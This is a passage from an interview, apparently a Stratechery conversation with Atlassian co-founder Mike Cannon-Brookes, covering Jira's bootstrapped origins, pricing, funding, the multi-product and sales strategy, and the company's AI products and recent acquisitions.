tracker. So the interesting evolution part of the company obviously is it started as a bug tracker for software developers, it became an issue tracker for technology teams and now it’s like a business workflow for tens of millions of people every day across the world, most of whom have nothing to do with technology, so it’s gone on its own evolution. Would anything have been different if this was the plan from the beginning, or did it have to be this organic, “We’re figuring it out as we go along as we’re running away from Windows installations”, sort of story? MCB: I think, look, obviously, if we could choose to follow in our own footsteps, the Back to the Future skeptic in me would say it’s gone pretty well, so I’d follow every single footstep I took. (laughing) Yep, totally. MCB: And that would’ve become the plan. But look, we had two hunches really, which both turned out to be radically correct. Now, I would say we were following waves or whatever else, but one was that the Internet would change software distribution, which sounds ridiculous now and when I talk to graduates nowadays, I have to put them in the right time and place and say, “Look, when we started, software was distributed on a CD”, BEA WebLogic was the bee’s knees and you used to have to get it on a CD if you were lucky. If not, someone would come and install it for you and that’s how software was distributed. We made that CD into a ZIP file and put it on the Internet for people to download. You didn’t access it like a SaaS application, you literally download it from our website. Right. It’s funny that when you first say that, it’s like, “Oh, it’s completely transformative”, well, but you were an on-premises software story. But actually, no, there’s several steps to getting to SaaS, one of which is just downloading software. MCB: And we had people call us before they would download to check that we were real and stuff and I’m like, “Why don’t you just download the damn ZIP file?”, and I also date them, because, well, maybe I’ll get to the business model part, but the second innovation was that we thought open source would change software costs. So we had this big hunch, we were both writing a bunch of open source code at the time. Open source was a massive movement, especially in the Java space. Embarrassingly, I actually wrote a book called Open Source Java Programming that you can find with some mates. It’s still on Amazon and we sold a few thousand copies, I think, but I swore I’d never write a book again, it was a very painful experience. Thank you, you’re validating my life decisions . MCB: Yeah. Open source did bring the cost of building software down radically. We were writing a very small layer, 5% of the code at best on top of masses of amazing open source libraries and we contributed to those libraries, but we could deliver an amazing experience for a very low cost. We learned a lot, pricing and packaging. So what was the implication of that hunch though? Just that the market for developers, that would subsequently mean there was more software? MCB: A little bit that was the implication of the hunch. Largely for us, it was that the cost was going down. Pre-open source, you had to write everything so if Jira was back then, I don’t know, a million lines of code, if you added all the open source libraries together, it was 25, 30, 40 million lines of code. It was so big that it was so expensive, because you had to write all of that. To think of Windows, they wrote everything, the networking stack, there were no libraries, there was no open source involved in the original versions, it was all written by Microsoft. So the cost of that was very high, then you had to charge a lot of money. So we thought, look, if we could take all these amazing open source libraries, contribute back to them — we were a great open source citizen — and build a piece of proprietary software on top of them that solved customer’s problems, we could deliver that really cheaply. In fact, we sold the original versions of Jira, they were $800, unlimited users, unlimited use with no lifespan. So it was just 800 bucks, one-time fee forever and we learned a lot about pricing and packaging firstly, but secondly, it was very simple. Our goal in the early days, we had to sell one copy a week to stay alive, that was it. Some weeks, we’d sell two copies. $1,600 US would roll in and we’d be like, “Cool, we got a week off to survive”, and then one copy a week became two and two became five and five became ten, and now it’s hundreds of thousands. Well, isn’t the thing you just didn’t want to have a job? So I love this part of the story, because when I started Stratechery, I had a job from Microsoft that made, I think, $104,000 or something like that. I’m like, “I just want to make that, because I don’t want to work for a corporation, so if I could just get to there, it’ll be great”. MCB: We had exactly the same sets of goals. We had a few things we wanted to make somewhere that we wanted to go to work. I wanted to get up every day and think, “I want to go to work”, and weirdly, almost 24 years later, I love coming to work, so a tick achieved. We wanted to make it so we didn’t have to wear a suit, neither of us really like wearing suits at all — in fact, it’s a bit of an allergic reaction often and so tick, don’t turn up to work in a suit every day. And thirdly, most of our friends, so this is right where IBM bought PwC ironically, so out of the 30-odd kids in our class, maybe 10 went to IBM as consultants and 10 went to PwC and then they all end up going to the same shop and their grad salary there was $47,600. So our goal for year one was to end the year making at least a grad salary and convince ourselves we’re not crazy kind of thing and we smashed that goal, so that was good, but that was there. The Internet, the distribution part is important, knowing your favorite topics. Tell me about that and along with the business model, because again, this goes back so far, I don’t think people appreciate the extent to this entire idea of self-serve or bottoms up selling. This is really where it all started. MCB: Yes. And look, a few things. Firstly, if you come from Australia, we’re an exporting nation. “We’re built on the sheep’s back”, is a phrase, Australia’s built on the sheep’s back. What that really means is because we were this colony originally, then country on the far side of the world, anything we did to make money largely had to leave the country and go somewhere else. Originally, that was a struggle to find a product that could do that. “Built on a sheep’s back” is because wool was the first product that could do that, you could put it on a wooden boat, because it wasn’t very heavy and you could ship it a long distance, because it kept really well, so we could make sheep’s wool and make money as a country by shipping it back to Europe and it could survive the journey and so the country was built on the sheep’s back. We are a massive exporting nation. Trump brings in his tariffs, we’re the only country with a negative rate of return, we have a positive trade relationship with America and we’re like, “Wait a second, why did we get taxed?”, so obviously, it’s rocks, technology, we build and export everything as a country that we do. So our mentality was like, “Well, if we’re going to make money, it’s going to be overseas”, that was the first thing, is, “Okay, it’s going to be somewhere else, it’s not going to be Australians buying our software”, and so the Internet allowed us to do this. We put up a shopfront, early website and people could come to our website, download our software and then we just needed a way to get paid for it. The problem was in order to do that and the trust barriers of the Internet, we had to have a very low price and we had to have a fully installable offering. So we spent so much time on making it installable, documentation, “How would you get yourself up and running and try it?” — the software, as we put it, had to sell itself. Our software had to be bought, not sold. We didn’t have any salespeople, we couldn’t travel to your office in Sweden or London and help you out with it. For $800, we couldn’t have done that and secondly, it didn’t make any sense. So the evolution was, “Okay, this is the only possible path that we can go down is we have to figure out how to get people to do this”, now it turns out once you have figured out how to do that, it’s an incredibly powerful motor because you have lots of people coming, you have a very cheap piece of software for its relative performance, and you get people using it in all these big businesses all over the place. I would say 50% of the customers I go meet nowadays, probably meet a handful of customers, a couple a day on an average kind of thing, many of those have been a customer for 20 years, 22 years, 23 years. How many customers have been a customer 23 years? I’m like that’s crazy, we’re only 24 years old. That’s awesome. MCB: And so they downloaded very early, they didn’t download as all of , all of them are customers. Just one guy who’s like, “I need a way to track my issues”. MCB: Exactly. It was some guy in a backroom who needed to track it. I know the Cisco origin story, that was literally a guy, he’s still there, he’s been there 22, 23 years, he’s awesome. And they started with just, “I just needed a way to manage my issues for 10 people”, and now it’s hundreds of thousands of people, seats that we have there, it’s kind of grown over time. How did we know that business model was working? Again, it dates us a lot, this didn’t mean we didn’t answer questions, we were big on customer service and helping people, email was the way to do that. A bit of IRC back then, we had a channel you could log into and we’d help you. But the first customer, we used to walk into the office in the morning and we had a fax machine with literally rolls of paper. So if you wanted to pay for this distributed software, this says how old, there was no SSL keys, I heard you complaining about it the other day, totally agree with that era. You had to download a PDF off our website, which was pretty modern that it was a PDF, fill in your credit card details, and fax it to us, that is how you paid when we started. So we would walk in the morning and there’d be these rolls of paper on the ground, you be like, “Ah, sweet, someone bought something”, you know what I mean? It became a weird dopamine drug for us. The very first company was American Airlines… MCB: About six months in that we came in the morning and there was a fax on the ground with $800 and a credit card number written on it and we had never talked to American Airlines, they had never emailed us, they had never asked for customer service, they’d never gone on IRC, they had never talked to us in any way, shape or form. Man, this thing could work, we just made $800 out of the air. MCB: I mean, there was a lot of pre-work to get them there, but obviously that was kind of different. MCB: Then secondarily, as you wrote, I’m just trying to finish a very long answer here, we started Confluence in 2004, and those two became the jewel engines and both of those I think were probably major moments. I often say Confluence is a bigger moment, actually. The business model was kind of established, this is two years into the business. We made, I think, $800 grand in year one, $1.6 million in year two, maybe $5 million in year three, and $12 million in year four, if I remember the revenue numbers. So the thing was working really well. You’re the company that’s the Microsoft heir in some respects, which is the really just you took venture eventually, but didn’t really need to, just pure bottoms up. You and Scott, we’re able to keep a huge portion of the company because of that, it’s an amazing story that is, I think, under-told in some respects. MCB: Yeah, well, we actually did. I mean, we did and didn’t. So the venture story is one of my favorites because it describes how we think from first principles. Firstly, the first capital we put on the balance sheet, institutional capital to put on the balance sheet, I guess you could argue our initial, I don’t know, $10 grand each was some money, but was in the IPO . So in 2015, when we went public, that was the first capital that went into the business all time. We took two rounds of funding, one in 2010 and one in 2013, but both of which were to employees, the first was to the founders and the second was to large number of employees who bought in so both of those companies bought ordinary stock. Secondary shares basically, yeah. MCB: They bought ordinary stock, there were no preferences, there were no anything, that was kind of the way it is. And we love the Accel guys that invested, it’s kind of funny because their business model was wildly wrong, we now have their original spreadsheets and stuff. We’ve 15 years in, you know them really, really well, they wanted us to grow it. I think we had to grow at 30% for two years, 20% the year after and something like that to double or triple their money and at the time they put in $60 mil US , that was the largest investment I think Accel had ever made in anything software, digital kind of world and it was this massive bet. It was a one-page term sheet for ordinary stock, so credit to those two partners who took massive risk on us, had to fight, we know that GC, everybody else to do this unusual funding round and I think we did 50% growth the first year, and our CAGR since then is probably 40%. Yeah, it worked out pretty well. MCB: They did very well. I think their 2-3x was more like a 300x or something. You mentioned the Confluence moment. Why was that a big deal? Usually the story is you have one product and you need to focus and you’re two years old, you’re launching a completely new product. Is that the aspect you’re referring to? MCB: Yes, I think it comes down to being bootstrapped. Look, we spent nine years convinced we were going to die every day, there was just such a mentality that this thing was all going to fall over and we better work harder and keep going. The Confluence moment was important because I remember, I don’t know exactly, but sometime around then we understood venture capital. Firstly, on the venture capital side, because they do relate to each other, there was no VC available in 2001 and 2002 in Australia. We’re a nuclear winter, we’re two idiots with no credibility. Right. You could barely get funded in San Francisco, you’re not going to get funding in Sydney. MCB: No, because 2001, you weren’t even finding San Francisco funding because the whole dot-com boom had just happened, no one was getting funded anyway. We’re in Australia and we have no credibility, so we didn’t even bother. We literally, 2010 when we went to the Accel thing and we talked to five VCs, was the first time we’d ever pitched the business. It was just not a thing, people don’t understand, we used to say we were customer-funded when people would ask the also awkward question of, “Who’s your funding come from?”, we were like, “We’re customer-funded”, They go, “Oh, okay”. Lifestyle business! MCB: But we did understand venture capital, massive readers, I have an army full of technical books, books about technology and the industry and history and stuff from that magic era of airport bookstores. We read every episode of Red Herring and Industry Standard and Wired Magazine, I have just this huge library, so voracious readers. One thing you understood about venture capital is they put the portfolio theory on their side — and I’m a big fan of venture capital, I should say, I’m the chair of Australia’s biggest VC fund and that’s my other mate that I met in university, Niki Scevak . But we wanted portfolio theory on our side, we’d done finance and economics, we had one product, this was highly risky if you’re bootstrapped. So there was a little bit of the thinking that actually if we have two products, our chances of total failure are less, one of them can fail and we’ll be okay and so we started a second product. Yes, arguably it was hard, but our first one was going all right, it was like making, I don’t know, five million bucks a year and we had a handful of really awesome backpacker programmers. And the early people, it’s like a whole total band of misfits that somehow made this thing work and we’re having a lot of fun, we’re working really hard and so we made another internal tool that became Confluence and being adjacent, but very different, selling to different audiences, but having a lot — if you bought one, there was a good reason to have the other one, no matter which way you started, became a really good symbiotic loop of these two engines that powered us for a very long time. So it was more a case of reducing our risk actually than anything else. Wasn’t it risky to be splitting your resources or did that not even occur to you? MCB: I don’t think it occurred to us, no. It was more about splitting our risk and we were doing pretty well, but it changed the business because we moved from being the Jira company to a software company, and I say that’s probably the most under-understood moment because we had to learn about not how to market Jira, but how to market software, not how to build Jira, but how to build software. So now we have 20, 25 apps in 5 different categories that sell to all sorts of different teams who own a business, but we had to become a software company. Microsoft, I don’t know the analogy’s really that fair to them, to be honest, or fair to us, it seems massively over-glamorizing what they’ve achieved, which is amazing, I’m huge fan of Microsoft. The need to understand how to sell, in their case, like Minecraft, SQL Server, Azure, AI, you have to understand the building, the creation of technology, the selling of technology, the marketing of technology at a generic level, it really helped us generify the business. I think if we’d gone too much longer, everybody would’ve been on the Jira team, it would’ve been too hard to start a second thing and instead, we’ve always been a multi-product company. You just mentioned selling a lot. When did you finally realize or transition away from just being self-serve to actually, “We’ve got to grow beyond this”? Was it almost like a pivot that came too late because your identity was so wrapped up into the, “We’re the self-serve company”? MCB: Look, it’s never been a pivot, I get asked this by investors all the time. I would say our go to-market model and our process has kept evolving pretty much every year or two for 20 years and I say evolving because we’re very aware of the strengths of the model that we came up with and we’re very aware of what it takes to power that and we’ve been very careful when we’ve evolved, changed, added to it, not to destroy the original one. So nowadays, we have two amazing business models where we call them high-touch and low-touch. So we have the low-touch model, which is literally the same thing as it’s always been, hundreds of thousands of people show up every week, they try our software, we want them to have a great experience trying the software, we want to spread it as widely as possible and as many enterprises as we can, and some of those will stick, some of those will get working and we measure aggressively the rates of return and dollars and flows and funnels and everything else. This whole team whose job is to make sure that that’s working at now massive scale, right. But at the same time, what happened is as customers got more and more Atlassian software deployed, they wanted a different relationship with us, they wanted a bigger relationship. Those days they used to be spending, as soon as we were spending $20 grand, we were like, “Oh man, maybe we should talk to these people”, nowadays it’s more like around $50 to $100 grand is when we’ll talk to you. So the lines kept moving for different reasons and we actually have online sales, inside sales in between actually, the sort of classical someone gets on an airplane and goes to travel to you. So it’s just kept evolving. We talk about the IPO a lot, it’s our 10-year anniversary coming up this month, I’m off to New York next week to ring the bell and celebrate 10 years. When we went public, as an example, we had less than 10 companies paying a million dollars a year, now we’re well north of 500 in 10 years. So that doesn’t come without an amazing enterprise sales team and teams that go out and help customers and customer success and all the trappings of a really top flight enterprise sales organization, because for most of those customers, again, I think it’s north of 85% of the Fortune 500 are deep Atlassian customers. We become a strategic partner to these businesses that if we go down, rockets don’t take off, banks shut down, it’s a real critical importance to most of these customers. How big is your business outside of directly working with developer teams? As I recall, this was part of the consulting thing was you were wanting to do Jira for sales or Jira for all these different sort of functions, where and how did that evolve? MCB: So it’s been a continuum for a long time. So nowadays, less than half of our users are in technology teams, and probably a third of those are developers, less than half of them. So a portion of our audience, it’s a very important point of words. When I talk about this, all the engineers are like, “Hey, you don’t care about us anymore”, I’m like, “No, that’s not true”, that business is a great business, it’s just the rest of our business has grown massively around it. There are not enough developers in the world for our business. Our fundamental value has always been actually, and it took us one of these things, it took a decade to realize, firstly, we don’t solve technology problems, we never have, we’ve never had anything that’s like, “I care what code you write, which language the code is in, what the code does”. We solve collaboration and people problems, we always have solved people problems, even Agile was a people problem. It’s not a technology problem, actually, it’s a people problem. It’s, “How do we organize a group of people to build a piece of technology that best meets the customer’s needs and goes off track as little as possible?”, that is a collaborative people problem, we’ve always solved people problems. Our value actually came because there’s a lot of tools for technology teams and we never wanted to be in the dev tools business, that’s a road of bones, it’s very hard to build sustainable competitive advantage and dev tools, the history shows this. There’s just a different company every few years, developers tastes are fickle, our developers taste are fickle, this is not me sledging developers at all, we have a massive R&D arm and that group changes languages every couple of years, they change how they build software every couple of years, they’re constantly moving on, they change our analytics tools and everything else because they are tool builders and toolmakers, that makes sense, but that’s a hard place to build a business. Interestingly topical today, so we’ll see. But the easier place to build a business in the long term was the level above that, which is the collaboration problems that came, which started as, “How do we get engineers, designers, product managers, business analysts to all be on the same page about what it is that they’re building and have a repeatable process for that?”. It turned out that as the world has become technology-driven, as we say, our customers are technology-driven organizations. If you’re a large organization for whom technology is your key distinct advantage, it doesn’t matter whether you’re making chips and databases or whether you’re making rockets or cars or whether you’re making financial services or insurance or healthcare, I would argue for most of the businesses that are great, technology is their key competitive advantage, then you should be our customer, that is it. And what we help you do is we help your technology teams and your business teams collaborate across that boundary because that’s actually the hardest boundary. Building great technology is one set of problems, making it work for your customers usually means in different industries, a different amount of working with all sorts of business people and that’s what Jira did from the very start. Now that’s what our whole portfolio in service management, in strategy and leadership teams is about doing that at different scales and different amounts in different places. Does it bug you when you get complaints on the Internet of, “Jira’s so complicated”, “Hard to use”, blah, blah, blah? And are you speaking to, the problem is that the problem space we’re working in is not the single developer trying to track an issue, it’s trying to herd a bunch of cats and get them the same direction and muddling through that is a lot more difficult than it seems. MCB: It bothers me anytime people don’t like our software, sure. We’ve worked for the last 20 years to make it better every day. We’ll probably work for the next 20 years to make it better every day and people will still probably be dissatisfied and that is our fundamental core design challenge. There’s a few reasons they say that. Firstly, the on-premise business model and the cloud shift is really important because with the cloud shift, we update the software, with the on-premise business model, we don’t, so you would often be on older data versions, customers would upgrade once a year or every two years or something, and so we can’t control that. Secondly, the challenge of Jira is at our core, we solve a whole lot of what we say is structured and unstructured workflows. Confluence is an unstructured workflow, Jira’s a very structured workflow. You have a set of steps, you have permissioning and restrictions, you have fields, you have what’s happening in this process. The auditor will do something and pass it to the internal accounting team, the accounting team will do this and pass it to legal, legal will do this and pass it to these people. You’re defining a workflow and you’re having information flow back and forth and a Jira work item is, as we call it, it’s a human reference to work. That’s the best description of what Jira is work in the knowledge work era is this very ephemeral concept. Back to your development example, is the code the software? Is the idea the software? Is the designs in Figma — these are all parts of what it is, this thing that’s called this virtual thing that we’ve built. What we track is with a human reference to that, so someone can say it’s a new admin console. Cool, here’s the design for the admin console, there’s the spec for the admin console, there’s the code for the admin console, here’s where it’s been tested, here’s where it’s deployed. Did customers like it? We need a reference to this thing that is otherwise spread across hundreds of systems and virtualized. Once you’re building a workflow system, companies, ours included, love process, we love workflows, we love control, and that control usually comes with more data. “Hey, don’t fill in these three fields, fill in these 50 fields”, and they’re all required for some reason and our job to customers is to say, “Do you really need 50 fields?”, because you’re creating a user experience- You’re ruining it for us! MCB: Your users are going to have to fill in all 50 fields, and it feels like that’s going to take you a while. We have customers — I went back and checked, I think almost every single person you’ve interviewed on your podcast is a customer of ours. I don’t know if it’s 100%, but it’s definitely north of 95% out of the last 20 guests. Stratechery is a customer of yours, so there you go. MCB: Oh, really? Well, there you go. Thank you. One of my engineers adores Jira, so I get the opposite angle from what I asked about. MCB: That’s right. So look, it’s a challenge for sure, but at the same time, man, the value we’ve created, the business value, the number of customers that run on it, it’s ironic, we talk about the AI era and all these other things. Literally, no chips go out of any of the chip companies you love talking about, every single one of them, soup to nuts. So at what point did you realize that AI was going to impact you in a major way? Was there an “aha” moment or it’s just been in the air? Or is it a specific time you realized, “Look, this is going to completely change what we do?” MCB: Again, I’m one of these — I’ve realized I’ve become the old man in the room. We’ve done machine learning for a long time in lots of ways because of our online business model, so I’d say we’ve done AI for a long time. Obviously, LLMs are what people refer to nowadays by AI and agents and these words that have corrupted the entire thing, the meaning changes in technology when it means something else. The launch of various versions of ChatGPT were very instructive obviously, they were a moment for everybody. The optimism, and I would say we’re massive AI optimists, it is the best thing that’s happened to our business in 25 years. Why? Because people might look at you from the outside and say you’re still characterized as — even though your business expanded far beyond developers — “Oh, you have a lot of developers”, I’m skipping over the transition to the cloud just because we’re running out of time, but it’s an interesting story. You did announce you are finally ending the on-premises software, which I’m curious, it is a sentimental moment to come to that decision, but people might look at you from the outside and say, “Oh, there’s a company that’s going to have a problem with AI, AI is going to replace developers, it’s the decreased seats . What are they going to do?” MCB: There’s a few ways to take that. I’m trying to put it on a tee for you. I think I know what you want to say. MCB: There’s a few ways to look at it. Firstly, I think AI is a good example where people are very concrete about the negatives and the positives are upside. I think it’s a huge force multiplier personally for human creativity, problem solving, all sorts of things, it’s a massive positive for society. That doesn’t mean there aren’t any negatives, but the net effect is really high. And we spend a lot of time, you hear it in the media talking about the job loss, the efficiency gains, whichever way you want to put it, that’s the thing. Well, that’s because it’s really concrete in a spreadsheet, “I can do this process with half as many people”, “Wow, look at that, that’s great”, what’s never written in the spreadsheet is all the new processes that get created, all the new ways of doing things, the quality of the output is going to be twice as high. If software costs half as much to write, I can either do it with half as many people, but core competitive forces, I would argue, in the economy mean I will need the same number of people, I would just need to do a better job of making higher quality technology. So our view on AI overall is an accelerant, not a replacement to everything we do, and just the next era of technology change is really positive. We’ve loved technology, we love the cloud, we love all the tech changes we’ve been through, mobile. Look, us as a business, we are in the game of knowledge work. We solve human problems, workflows, business processes, this is what we do. These largely revolve around text, or if it’s video nowadays, that can be reduced to text in various ways. LLMs allow us to understand that text in a massively deeper way than we ever have been, and the problems we solve aren’t going away. 20 years time, there’ll be groups of people trying to solve some sort of problem as a team and working on a project, and so these things aren’t going to go. They’re going to need to talk to each other and collaborate of what work’s going on and how it’s working, so the textual aspect of it has been amazing. The features we’ve been able to ship, we never could have built five years ago, it was literally impossible, so the ability to solve customer problems is so much higher than it ever has been. Secondly, our software is incredibly valuable at the core of these workflows, but it’s also incredibly promiscuous. What I mean by that is we have always been very highly interlinked with everything else. If it’s a sales team, there are links to Salesforce and customer records, there are links to internal systems, there are links to maybe features that need to be built, there are links to some content and document. So any Jira, Confluence, or Loom , you don’t record a Loom unless you’re talking about something, you don’t have a Jira issue without pointing to all sorts of different resources, whether that’s a GitHub or Figma, whether it’s Salesforce or Workday. That gives us a really unique knowledge, which we’ve turned into the teamwork graph, that actually started pre-AI, so the irony is the Teamwork Graph is about 6 years old. Well, it started with Confluence. This is the whole thing where you look backwards, and to your point, if you had just been the Jira company, but because from the very beginning, you mentioned Confluence was different but it was adjacent and you had to build the links and stuff together, and as you build all these different tools, because everyone wants to be this point of integration. And I wanted you to tell me about Rovo and this idea of being able to search across all your documents. Who gets permission to do that? It’s someone that’s already there, and you made the critical decision to be there back in 2004 or whatever it was. MCB: That’s true. Certainly back in 2004, and then in I think 2019, the Teamwork Graph starts, which is trying to take all of those links and turn them into a graph. The connectivity, two things linked to this Figma thing, five things linked to this customer record — okay, cool, that means something, so we built this Graph. To be honest, it was a bit of a technology lark. We have a lot of these projects that are really cool and we’re like, “We’ll be able to use this somehow and it’s going to grown”, and now it’s a hundred billion objects and connections connecting all of the company’s knowledge. It becomes the organizational memory nowadays and context and all these things nobody knew in 2019 that’s what it was going to be, it just seemed we needed it for various process connections. That turns out to be because it’s got permissions and compliance and all of the enterprise stuff built in, which is incredibly difficult, the best resource to point AI at in various forms. You still have to be good at the AI parts to get the knowledge, the context for any area, so the Teamwork Graph is our data layer. It’s not only the best kind of enterprise search engine for your content from a 10 Blue Links kind of way of thinking. If you’re chatting through your content, you still need all your organizational knowledge. I actually obviously found your Article, I was like, “Hey, what has Ben Thompson written about us last year?”, and I asked Rovo in chat and it comes back to me with he wrote this, that and the other and pulls out some snippets. I’m like, “Tell me more, do you think we’ve hit that?”, I literally got a report written by Rovo on your report as to whether it had been accurate. “Go look at the last 10 years with deep research and web search and come back and tell me, was he right or wrong?”, and it gave me a really interesting analysis of whether you were right and wrong. It’s like most AI things, it’s like 90% correct, it’s pretty good. It solved a lot of the first problem and I would not have done that work otherwise. I would have read it quickly and so I wasn’t going to put an analyst on it internally to do this work, but I could send something to do work I never would’ve done. Who’s your competitor for this spot, for this Rovo position where you have all this context, you can actually search your company in a way that just wasn’t possible previously? MCB: Who are the competitors you say? Yeah, because everyone is claiming they’re in this spot, “We can be the central place that you go and we have visibility everywhere”, why is Atlassian the one that’s going to win that space? MCB: A few reasons why we will. I think we have a great chance to be a great player is maybe the easiest way to say it. I think everybody loves this absolute win position, we don’t believe in enterprise technology, you usually get these absolute wins, it’s not quite the same as in the consumer world. We have a lot of business processes and workflows, millions every day that run through us, those are human collaboration workflows, so they are cool. The auditing team hands off to the accounting team, hands off to the tax team, whatever it is, sales workflows, marketing workflows, and they span lots of our applications and many others. If you’re going to go and introduce agents, these autonomous AI-driven software programs, whatever you want to call an agent, you’re going to put them into existing processes to make those processes either more efficient, more accurate. When the human picks up a task, it’s got all the information they need because something’s gone out to find it, that is an incredibly powerful position, which is why we support our agents and everybody else’s. You can assign a Jira work item to a Cursor agent in terms of code, you can assign it to a Salesforce agent. If you have your agent technology choice, I don’t think you’re going to have one agent platform, I think you’re probably going to have multiples, there are going to be a handful of organizational knowledge graphs that are powerful enough to solve these problems across multiple tools, but we have access to all those tools. We already know the information to some level, and that becomes a very unique advantage. Do you see this as a way to expand even further how much of a company you cover? You started with developers, then you expand to adjacent teams, and you talk about it’s now just a fraction of your user base. Do you own entire companies or could you get there? It’s like, “Okay, we still have these teams over here that are not on Jira, but Rovo’s so good that we need to bring everyone in”? MCB: Look, again, it would be great. I think it is unrealistic, and we should say “Absolutely”, right? MCB: If [Salesforce CEO Marc] Benioff was here, he’d be like, “Absolutely, we’ll own the world”, we love him, that’s the way he is, I don’t think about it as owning a customer. Our mentality has always been — I always use the subway analogy versus we have some competitors, for example, that want to be the control tower, their whole thing is we’ll be the control tower, just give us control and we’ll go and control everybody else, we’ll move the planes around. I think in enterprise IT, that’s an unrealistic view. Every CIO has been sold this for decades, it doesn’t happen because the world changes too quickly. Our philosophy and our commitment to customers has always been we will be a great citizen on all sides, we will interact with all of the applications you need, the old ones and the new ones, and we will be a valuable point of exchange in your business workflows and processes, whether those are structured like in Jira, whether unstructured like in Loom or Talent or something else. The reason for that is you have lots of systems. We want to be a valuable station on your subway network, we don’t want to be at the end of one of the lines, we want to be one of the handful of hub stations that are about moving trains around, and that is the best way to get your knowledge moving in your organization, it’s the best way to deal with your processes. Therefore, we need to have amazing AI capabilities. We have a massive investment in R&D, we have thousands of people working on AI tooling at the moment, and we have a huge creation bent, which is one of the reasons I think — we’ve talked a bit about the data advantage we have, I think we have a huge design advantage, and I actually think design is one of the hardest parts of building great AI experiences because it’s real fundamental design for the first time. You had a great line, you did a podcast a couple of weeks ago that I’ll put a link to, but you mentioned basically, the customer should not need to understand the difference between deterministic and probabilistic in the context of design, that’s what you’re driving at here. MCB: They should not need to understand that, they should need to understand when outcomes, outputs may be wrong or may be creative. Again, you talk a lot about the fact that hallucination is the other side of creativity, right, you can’t have one without the other. Hallucinations are a miracle. We have computers making stuff up! MCB: Our job is to explain to a customer when that happens, so it’s like this might be something you want to do, and that requires a lot of design. We have a feature in Jira called Work Breakdown which is super popular, where I can take a Jira issue and say, “Make me a bunch of sub-issues, this task has to be broken into a set of steps”. I don’t believe in the magic button theory of AI, that I’ll just hit a button and it’ll do all the things, I believe deeply in the value from AI will come from human-AI collaboration in a loop. It’s me and the AI working back and forth. You talk about yourself and Daman quite a lot , and it’s you, Daman and ChatGPT working together, but it’s not like you ask one thing and it’s done. It’s an interaction, it’s a collaboration back and forth, and that’s going to happen everywhere. In Work Breakdown, what it does is it says, “Hey, based on these types of documents I’ve gone to find from your whole graph in Google Docs and Confluence, whatever, I think this piece breaks down into these, is that correct?”, and it goes, “No, actually, that one doesn’t make any difference, these two are really good, you forgot about this document”, “Cool, let me go do that for you again”, and come back and say, “Is it these?”, “That’s closer”, and then you’re like, “That’s good enough, it’s 90% of what I need”, and then I go add the two that I need myself. That is a huge productivity boost but it’s not magically correct, and it requires a lot of design to tell people, “These are not the answers, these are possible answers, help us refine them and get better at it so that you get the 90% upside and the 10% downside is managed”. Are all these people pursuing these full agents that act on their own, are they just totally misguided? MCB: No, because I think, well, agents will take — there’s a snake oil sales thing going on as there always is in any bubble, and the snake oil sales is not wrong, it’s just chronologically challenged. (laughing) That’s so good. MCB: Well, customers are struggling. When I talk to customers every day, they’re like, “Is everyone else using these things to just magically transform their business with this simple, it took them five minutes and it’s replaced entire armies of people?”, and I’m like, “No, nobody’s doing that”. What they’re actually doing is taking business processes that are really important to their business and saying, “Okay, can I make this step better? This is highly error-prone. It’s compliance in a large organization, how do I make this part of the process better?”, and we’re like, “Oh, we can totally do that”, and they will replace small bits of lots of processes so that in Ship of Theseus style, five years from now, the process will look radically different. Occasionally, they are replacing entire processes, but this is the 1% case, what they’re actually doing is they have whole machines that are running and they’re trying to fix this cog and fix that cog, and that’s super valuable for them. That’s not a downside, that’s really, really valuable. And often, it’s work they didn’t want to do, work that wasn’t getting done, it wasn’t done at a high quality, so we got to remember that, I say this quite a lot, people shouldn’t be afraid of AI taking their job, I fundamentally believe this, they should be afraid of someone who’s really good at AI taking their job. That’s actually what’s going to happen, is someone is going to come along, in a sales sense, they’re really good at using all these AI tools to give better customer outcomes or handle more customers at one time. Is this why you’re hiring so many young people? MCB: Yes, I guess so. Yes, they’re more AI-native, they come out understanding these tools and technologies. I find the biggest irony in universities is all these people who “cheat” their way through every assignment, I use cheat in quote marks, using ChatGPT to handle these assignments, and then they’re worried AI is going to take all these jobs. I’m like, “Wait, you literally took your own job of writing the assignment, but you’ve also trained yourself on how to use these tools to get the outcome required” — now one might argue the university degree should be different, but just like when Google came along and you could look up any fact, knowing facts became far less important than the ability to look it up. I still think AI, it doesn’t create anything, maybe slightly controversial, but I argue it synthesizes information, it’s really good at processing huge amounts of information, giving it back to you, changing its form, bringing it back. Humans are still the only source of fundamental knowledge creation. I point out one of the flaws in the one person billion dollar company argument, and this will happen but it’ll be an anomaly. That company doesn’t get created without that one person, so there’s not AI creating companies magically. It’s like can a company eternally buy back its stock? No, because at some point, someone is going to own the final share? MCB: That’s right and I think this is missed, right? This is where we say it’s about unlocking creativity and what we do for our customers is put Rovo and these amazing data capabilities that we have alongside all the enterprise compliance and data residency, and there’s a massive amount of making this work in the enterprise with trust and probity and security. It’s very difficult. And great design to say, “What do you hire us to do? How do you get these technology and business teams to work together? What workflows do you have in your projects and your service teams, and how can we make those workflows better with more data and make your teams more informed?” That will end up with us having more share of employees in a business that use our stuff every day. Awesome. You made two big acquisitions recently, the DX acquisition , I think, makes a ton of sense to me measuring engineering productivity, particularly in the area of AI. What actual ROI are we getting on this? MCB: And how much money am I spending? Because I’m spending suddenly a lot of money, right? This is not cheap at all, I have huge bills. Internally, we use Rovo Dev , we use Claude Code, we use GitHub Copilot, we use Cursor, we have them available to all. We have a huge R&D — again, I think we’re still number one on the NASDAQ for R&D spending as proportion of revenue. You can take that as a good thing in the AI era or a bad thing, everyone gets to choose their own view on that, but we’ve always been incredibly high on R&D spending since day one. The bills that we pay though are very high, so DX is simply saying, “Okay, cool, how do I measure what I’m getting for that? Should I pay twice as much money because these bills are worthwhile, or is there a lot of it that’s actually just it’s really fun and it’s not actually leading to productivity gains?”. This is going to be a hard problem because there’s a lot of money on the line at the moment that people are paying for these tools, which is not without value, but measuring exactly what the value is is really, really hard, and that team’s done a phenomenal job. And we now have an Atlassian office in Salt Lake City, Utah, where I already spend a lot of time. Totally by coincidence, but it’s really nice. So that purchase, love it, makes a ton of sense. In perfect alignment with you. How does The Browser Company fit in? MCB: A lot of ways. So I have believed for a long time that browsers are broken. We’ve built browsers for an era of software that we don’t live in today. And I don’t, in my browser, have a bunch of tabs that represent webpages, I don’t have that. I have a bunch of tasks, I have a bunch of applications, I have a bunch of documents, and the browser was fundamentally never built to do that. That’s what Arc, first product from The Browser Company — if you don’t use Arc every single day, you should be, it’ll increase your productivity instantly because it’s built for knowledge workers and the way that they have to actually work every day and how they manage all of these tabs and tasks and flows versus serving the New York Times or whatever. That is a browser built for knowledge workers, and 